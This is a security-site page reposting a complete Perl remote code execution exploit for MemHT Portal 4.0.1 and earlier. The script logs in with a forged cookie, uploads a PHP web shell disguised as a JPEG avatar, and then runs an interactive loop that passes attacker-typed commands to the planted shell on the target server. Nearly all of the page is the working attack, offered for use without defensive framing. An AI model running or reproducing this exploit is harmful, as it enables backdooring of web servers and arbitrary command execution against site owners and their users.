首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
#!/usr/bin/perl 
# MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
# by yeat - staker[at]hotmail[dot]it

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


getopts('p:',\my %opts);

my ($host,$file,$id,$username,$password) = @ARGV;

my $http = new LWP::UserAgent;
my $u_agent = "Lynx (textmode)";
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);


Main::RunExploit();


# Main Package

package Main;


sub Usage {

return print <<EOF;
+--------------------------------------------------------------+
| MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit |
+--------------------------------------------------------------+
by yeat - staker[at]hotmail[dot]it

Usage: perl xpl.pl host/path file id user pass [OPTIONS]
host: target host and memht path
file: file to upload
user: valid username
pass: valid password
id: user id

Options:

-p [specify a proxy] [server]:[port]

Example: 
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure 
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure -p 213.151.89.109:80

EOF

}


sub RunExploit 
{    
    if (defined $opts{p}) {
        HTTP::Proxy($opts{p});
    }
    
    if (@ARGV < 5 || @ARGV > 7) {
        Main::Usage();
    }
    else { 
        HTTP::UserAgent($u_agent);
        MemHT::Login();     
        MemHT::Exploit($file);
    }    
}




# MemHT Exploit Package

package MemHT;

sub Exploit 
{
    my $resp;
    my $file = shift(@_);
    my $path = "/index.php?page=users&op=editProfile";

    my $data = {
        chg_email => 'yeat@doesntexist.net',
        avatar    => [
                      undef,
                      $file,
                      Content_Type => 'image/jpeg',
                      Content      => '<?php error_reporting(E_ALL); eval($_REQUEST[\'cmd\']); ?>',
                      # Content => 'Here you can write everything :) this is an example!',
                     ],
        chg       => 'true',
        Submit    => 'Modify',
    };  
    
    my $send = $http->post('http://'.$host.$path,
                           $data,
                           Content_Type => 'multipart/form-data',
                          );
    
    if ($send->as_string =~ m{logout}i) {
        print "File Uploaded! / $host/images/avatar/uploaded/$file\n\n";
        
        while (1) {
           print "\n[yeat-PHPshell]:~# ";
           chomp(my $content = <STDIN>);
           $resp = HTTP::GET("$host/images/avatar/uploaded/$file?cmd=$content");
           print $resp->content;
        }                         
    }
    else {
        print "Exploit Failed!\n";
        exit;
    }     
}   
           

sub Login
{
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
    
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
        exit;
    }
}           
           
                                 

# HTTP Package

package HTTP;


sub Cookies 
{
    return $http->default_header('Cookie' => $_[0]);
}

sub UserAgent 
{
    return $http->agent($_[0]);
}    

sub GET 
{    
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }    
    else {
        return $http->get($_[0]);
    }    
}
    
sub POST 
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->post('http://'.$_[0]);
    }    
    else {
        return $http->post($_[0]);
    }    
}
    
sub http_header 
{
    return $http->default_header($_[0]);
}            
    
sub Proxy 
{
    return $http->proxy('http', 'http://'.$_[0]);   
}   

# [2009-01-25]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Siemens ADSL SL2-141 CSRF Expl
·Mambo com_sim v0.8 Blind SQL I
·Merak Media Player 3.2 m3u fil
·Web-Calendar Lite 1.0 (Auth By
·MySQL 4/5/6 UDF for Command Ex
·Flax Article Manager 1.1 (cat_
·PostgreSQL 8.2/8.3/8.4 UDF for
·OpenGoo 1.1 (script_class) Loc
·MediaMonkey 3.0.6 (.m3u file)
·EPOLL SYSTEM 3.1 (password.dat
·EleCard MPEG PLAYER (.m3u file
·SunOS Release 5.11 Version snv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved